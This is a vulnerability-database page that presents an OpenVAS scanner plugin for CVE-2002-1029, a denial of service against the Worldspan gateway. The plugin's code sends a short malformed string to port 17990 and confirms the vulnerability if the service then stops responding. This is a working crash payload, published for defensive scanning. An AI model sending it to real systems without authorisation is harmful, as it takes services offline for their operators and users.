Lucene search

K

Worldspan Gateway DoS Vulnerability

🗓️ 03 Nov 2005 00:00:00Reported by Copyright (C) 2002 Michel ArboiType 
openvas
 openvas
🔗 plugins.openvas.org👁 17 Views

Worldspan Gateway DoS Vulnerability. Possible to crash the Worldspan gateway by sending illegal data

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Related
Refs
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
Worldspan for Windows Gateway Res Manager Port 17990 Malformed Request DoS
19 Jul 200200:00
nessus
NVD
CVE-2002-1029
4 Oct 200204:00
nvd
Cvelist
CVE-2002-1029
31 Aug 200204:00
cvelist
CVE
CVE-2002-1029
4 Oct 200204:00
cve
SourceLink
securityfocuswww.securityfocus.com/bid/5169
# SPDX-FileCopyrightText: 2002 Michel Arboi
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.11049");
  script_version("2023-07-21T05:05:22+0000");
  script_tag(name:"last_modification", value:"2023-07-21 05:05:22 +0000 (Fri, 21 Jul 2023)");
  script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/5169");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_cve_id("CVE-2002-1029");
  script_name("Worldspan Gateway DoS Vulnerability");
  script_category(ACT_DENIAL);
  script_copyright("Copyright (C) 2002 Michel Arboi");
  script_family("Denial of Service");
  script_dependencies("find_service.nasl");
  script_require_ports(17990);

  script_tag(name:"solution", value:"Upgrade your software.");

  script_tag(name:"summary", value:"It was possible to crash the Worldspan gateway by sending illegal data.");

  script_tag(name:"impact", value:"A cracker may use this attack to make this service
  crash continuously, preventing you from working.");

  script_tag(name:"solution_type", value:"VendorFix");
  script_tag(name:"qod_type", value:"remote_analysis");

  exit(0);
}

#
# I suspect that the service will be killed by find_service.nasl before
# this script can do anything...
#

port = 17990;
if( ! get_port_state( port ) )
  exit( 0 );

soc = open_sock_tcp( port );
if( ! soc )
  exit( 0 );

s = string( "worldspanshouldgoboom\r" );
send( socket:soc, data:s );
close( soc );
# According to the advisory, Worldspan eats CPU and crashes after ~ 1 min
sleep( 60 );

soc = open_sock_tcp( port );
if( ! soc ) {
  security_message( port:port );
  exit( 0 );
}

close( soc );
exit( 99 );

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
03 Nov 2005 00:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS25
EPSS0.04891
17
.json
Report